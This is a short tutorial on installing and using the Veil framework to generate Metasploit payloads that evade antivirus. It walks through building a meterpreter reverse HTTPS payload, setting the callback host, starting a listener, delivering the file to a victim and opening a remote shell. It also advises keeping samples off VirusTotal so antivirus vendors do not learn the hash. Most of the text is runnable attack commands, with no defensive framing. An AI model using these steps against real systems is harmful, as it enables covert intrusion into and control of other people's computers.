Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.
Installation
1. Run the commands below and wait for installation to complete
- sudo apt-get -y install git
- git clone https://github.com/Veil-Framework/Veil.git
- cd Veil/
- ./config/setup.sh –force –silent
2. Upon completion. You can run the application with the command
- ./Veil.py
3. If you ever need to change or update the config you can modify/run the file named /config/update-config.py. (This will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update)
- cd config/
- sudo ./update-config.py
Using the interface
1. When the application is run, we will get to the main menu where we are shown interested information
- application version
- Available tools
- Available commands
2. list available tools
- list
3. We can gather information about the available tools
- info Evasion
- info Ordnance
4. Show variables and configuration
- options
5. Select a tool
- use Evation
6. Now within the module the available commands change for the module. To check a hash against virustotal hashes (not recommended, since virustotal can redistribute the hash to antivirus)
- checkvt <hash>
7. Listing the available payloads
- list
8. To check upon the options and variables available within payloads
- info python/meterpreter/rev_https.py
9. Select a module by number ID
- use 7
10. Set the payload options, and generate the file, assign a name to the file also
- set LHOST 192.168.0.8
- generate
11. We know the files were stored in the /var/lib/veil/output directory. We need to integrate it with Metasploit
- msfdb init
- msfconsole
12. Now import the Metasploit script created by Veil, it will start a listener
- resource /var/lib/veil/output/handlers/payload.rc
13. Have the file delivered, and, wait for a client to execute it. You will see session log in Metasploit
- sessions
14. Accessing the current session
- sessions -i 1
- sysinfo
- shell